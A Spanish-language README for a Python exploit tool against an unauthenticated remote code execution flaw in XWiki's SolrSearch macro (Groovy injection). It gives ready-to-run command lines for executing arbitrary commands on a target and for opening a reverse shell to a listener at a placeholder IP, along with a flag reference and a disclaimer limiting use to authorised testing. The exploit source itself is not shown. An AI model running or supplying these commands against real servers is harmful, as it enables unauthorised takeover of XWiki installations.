
Exploit de RCE no autenticado de XWiki para Reverse Shell
Exploit de RCE no autenticado en XWiki
Las versiones afectadas de XWiki contienen una vulnerabilidad de Ejecución Remota de Código causada por el manejo inseguro de expresiones Groovy en la macro SolrSearch. Atacantes no autenticados pueden ejecutar código Groovy arbitrario de forma remota y obtener una shell inversa.
Este exploit se puede utilizar para ejecutar código en la máquina objetivo y también puede establecer una shell inversa. Dos modos están disponibles: interactivo o basado en parámetros. El exploit puede iniciar automáticamente un listener o utilizar uno existente.

python3 xwiki_groovy_rce.py
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
-h/--help: Muestra el menú de ayuda
-u/--url: URL de XWiki objetivo (requerido)
-r/--reverse-shell: Ejecuta una shell inversa
-c/--command: Ejecuta un solo comando
-i/--ip: Especifica la IP del listener (solo para shell inversa)
-p/--port: Especifica el puerto del listener (solo para shell inversa, por defecto=4444)
--no-listener: No iniciar un listener (solo para shell inversa)
Esta prueba de concepto es solo para fines educativos y de pruebas autorizadas.
El uso no autorizado contra sistemas que no posee o para los que no tiene permiso explícito para probar es ilegal.
Los autores no se hacen responsables del mal uso de esta información.